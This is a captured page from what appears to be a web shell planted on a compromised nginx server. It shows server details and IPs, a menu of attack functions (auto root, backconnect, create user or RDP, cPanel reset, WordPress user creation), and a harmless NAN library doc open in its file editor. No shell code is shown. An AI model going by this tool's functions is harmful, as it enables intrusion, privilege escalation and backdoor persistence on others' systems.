Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
nan /
doc /
[ HOME SHELL ]
Name
Size
Permission
Action
asyncworker.md
5.22
KB
-rw-r--r--
buffers.md
2.07
KB
-rw-r--r--
callback.md
2.57
KB
-rw-r--r--
converters.md
1.9
KB
-rw-r--r--
errors.md
7.23
KB
-rw-r--r--
json.md
1.9
KB
-rw-r--r--
maybe_types.md
21.88
KB
-rw-r--r--
methods.md
26.61
KB
-rw-r--r--
new.md
4.75
KB
-rw-r--r--
node_misc.md
5.57
KB
-rw-r--r--
object_wrappers.md
8.03
KB
-rw-r--r--
persistent.md
10.63
KB
-rw-r--r--
scopes.md
2.31
KB
-rw-r--r--
script.md
1.26
KB
-rw-r--r--
string_bytes.md
1.86
KB
-rw-r--r--
v8_internals.md
7.21
KB
-rw-r--r--
v8_misc.md
2.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : string_bytes.md
## Strings & Bytes Miscellaneous string & byte encoding and decoding functionality provided for compatibility across supported versions of V8 and Node. Implemented by NAN to ensure that all encoding types are supported, even for older versions of Node where they are missing. - <a href="#api_nan_encoding"><b><code>Nan::Encoding</code></b></a> - <a href="#api_nan_encode"><b><code>Nan::Encode()</code></b></a> - <a href="#api_nan_decode_bytes"><b><code>Nan::DecodeBytes()</code></b></a> - <a href="#api_nan_decode_write"><b><code>Nan::DecodeWrite()</code></b></a> <a name="api_nan_encoding"></a> ### Nan::Encoding An enum representing the supported encoding types. A copy of `node::encoding` that is consistent across versions of Node. Definition: ```c++ enum Nan::Encoding { ASCII, UTF8, BASE64, UCS2, BINARY, HEX, BUFFER } ``` <a name="api_nan_encode"></a> ### Nan::Encode() A wrapper around `node::Encode()` that provides a consistent implementation across supported versions of Node. Signature: ```c++ v8::Local<v8::Value> Nan::Encode(const void *buf, size_t len, enum Nan::Encoding encoding = BINARY); ``` <a name="api_nan_decode_bytes"></a> ### Nan::DecodeBytes() A wrapper around `node::DecodeBytes()` that provides a consistent implementation across supported versions of Node. Signature: ```c++ ssize_t Nan::DecodeBytes(v8::Local<v8::Value> val, enum Nan::Encoding encoding = BINARY); ``` <a name="api_nan_decode_write"></a> ### Nan::DecodeWrite() A wrapper around `node::DecodeWrite()` that provides a consistent implementation across supported versions of Node. Signature: ```c++ ssize_t Nan::DecodeWrite(char *buf, size_t len, v8::Local<v8::Value> val, enum Nan::Encoding encoding = BINARY); ```
Close